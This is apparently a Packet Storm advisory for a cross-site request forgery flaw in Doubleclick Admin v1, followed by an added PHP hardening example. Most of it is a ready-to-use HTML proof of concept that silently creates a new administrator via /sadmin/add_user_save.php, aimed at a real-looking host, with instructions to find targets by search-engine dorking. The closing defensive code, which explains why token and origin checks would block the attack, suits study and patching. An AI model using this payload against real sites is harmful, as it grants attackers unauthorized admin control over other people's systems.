PACKETSTORM:174035

Doubleclick Admin 1 Cross Site Request Forgery

2023-08-08 00:00:00
indoushka
packetstormsecurity.com
126
cross site request forgery
code injection
admin creation
`====================================================================================================================================  
| # Title : Doubleclick Admin v1 CSRF Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 115.0.2(64-bit) |   
| # Vendor : https://codecanyon.net/ |   
====================================================================================================================================  
  
PoC:  
  
[+] Dorking in Google or other search engines.  
  
[+] The following HTML code creates a new admin.  
  
[+] Go to line 2.  
  
[+] Set the target site link, save the changes and apply.  
  
[+] Affected file: /sadmin/add_user_save.php.  
  
[+] http://127.0.0.1/q7.3/sadmin/add_user_save.php.  
  
[+] Save the code as poc.html.  
  
<br>  
<form action="https://oecglobalnet/application/sadmin/add_user_save.php" method="post" name="formObj">  
<table width="96%" cellspacing="0" cellpadding="0" border="0" align="center">  
<tbody><tr>   
<td valign="top" height="30"> <table bordercolorlight="#d9d9d9" bordercolordark="#ffffff" width="100%" cellspacing="0" cellpadding="4" bordercolor="#d9d9d9" border="1" align="center">  
<tbody><tr>   
<td valign="middle" bgcolor="F5F5F5">ชื่อผู้ใช้งาน   
:</td>  
<td bgcolor="#FFFFFF"><input name="user" type="text" class="inputbox" id="user" size="30" maxlength="10" style="border:1px #cccccc solid" value="" onfocus="this.style.backgroundColor='ccffcc'" onblur="this.style.backgroundColor='ffffff'">   
<font color="#FF0000">*</font> </td>  
</tr>  
<tr>   
<td valign="middle" bgcolor="F5F5F5">Level   
:</td>  
<td bgcolor="#FFFFFF">   
<input type="radio" name="level" value="1"> Supper Admin  
<input type="radio" name="level" value="2" checked=""> Admin  
</td>  
</tr>  
<tr>   
<td valign="middle" bgcolor="F5F5F5">รหัสผ่าน   
:</td>  
<td bgcolor="#FFFFFF"><input name="pass" type="password" class="inputbox" id="pass" size="30" maxlength="30" style="border:1px #cccccc solid" value="" onfocus="this.style.backgroundColor='ccffcc'" onblur="this.style.backgroundColor='ffffff'">   
<font color="#FF0000">*</font> </td>  
</tr>  
<tr>   
<td valign="middle" bgcolor="F5F5F5">ยืนยันหรัสผ่าน   
:</td>  
<td bgcolor="#FFFFFF"><input name="pass2" type="password" class="inputbox" id="pass2" size="30" maxlength="30" style="border:1px #cccccc solid" value="" onfocus="this.style.backgroundColor='ccffcc'" onblur="this.style.backgroundColor='ffffff'">   
<font color="#FF0000">*</font> </td>  
</tr>  
<tr>   
<td width="14%" valign="top" bgcolor="F5F5F5">&nbsp;   
</td>  
<td width="86%" bgcolor="#FFFFFF"> <div align="left">   
<input type="submit" name="Submit" value=" Save ">  
</div></td>  
</tr>  
</tbody></table></td>  
</tr>  
</tbody></table>  
</form>  
  
Greetings to :=================================================================  
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |  
===============================================================================  
`
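The handler the PoC posts to accepts the form with nothing tying the request to the admin's own session, which is why a page on any origin can submit it. Below is an added example, not the vendor's code, of the checks a hardened `sadmin/add_user_save.php` would apply before creating an account: a per-session token compared in constant time, an Origin/Referer host check, and a SameSite session cookie. The `user`, `pass` and `level` field names come from the PoC form; `ALLOWED_HOST` and the `csrf_token` field are assumed names.

```php
<?php
// Added example, not the vendor's code: hardened entry for sadmin/add_user_save.php.
// ALLOWED_HOST and the csrf_token field are assumed names; user/pass/level are
// the field names from the advisory's PoC form. Needs PHP 7.3+ for the cookie params.
const ALLOWED_HOST = 'admin.example.com';   // the site's own host (assumption)

// SameSite=Lax keeps the session cookie out of cross-site POSTs such as poc.html.
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true, 'secure' => true]);
session_start();

// Per-session synchronizer token; the admin "add user" form must embed it as
// <input type="hidden" name="csrf_token" value="..."> on every submission.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// The submitted token must equal the session copy; hash_equals avoids timing leaks.
function csrf_valid(?string $submitted): bool {
    return is_string($submitted)
        && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

// Origin (Referer as fallback) must name this site; a page on another origin
// cannot make the browser spoof these headers.
function same_origin(array $server, string $allowed_host): bool {
    $src  = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $host = $src === '' ? null : parse_url($src, PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, $allowed_host) === 0;
}

if (($_SERVER['REQUEST_METHOD'] ?? '') !== 'POST') {
    http_response_code(405);
    exit;
}
if (!same_origin($_SERVER, ALLOWED_HOST) || !csrf_valid($_POST['csrf_token'] ?? null)) {
    http_response_code(403);
    error_log('CSRF check failed on add_user_save.php from ' . ($_SERVER['REMOTE_ADDR'] ?? '?'));
    exit('Forbidden');
}

// Only after both checks pass does the original handler's logic run.
$user  = $_POST['user']  ?? '';
$pass  = $_POST['pass']  ?? '';
$level = (int) ($_POST['level'] ?? 2);
// ... existing admin-creation code (password hashing, DB insert) follows here ...
```

A request generated by the PoC page carries no `csrf_token` field and an Origin of whatever host served `poc.html`, so it fails both checks and is logged as a 403 rather than creating an admin.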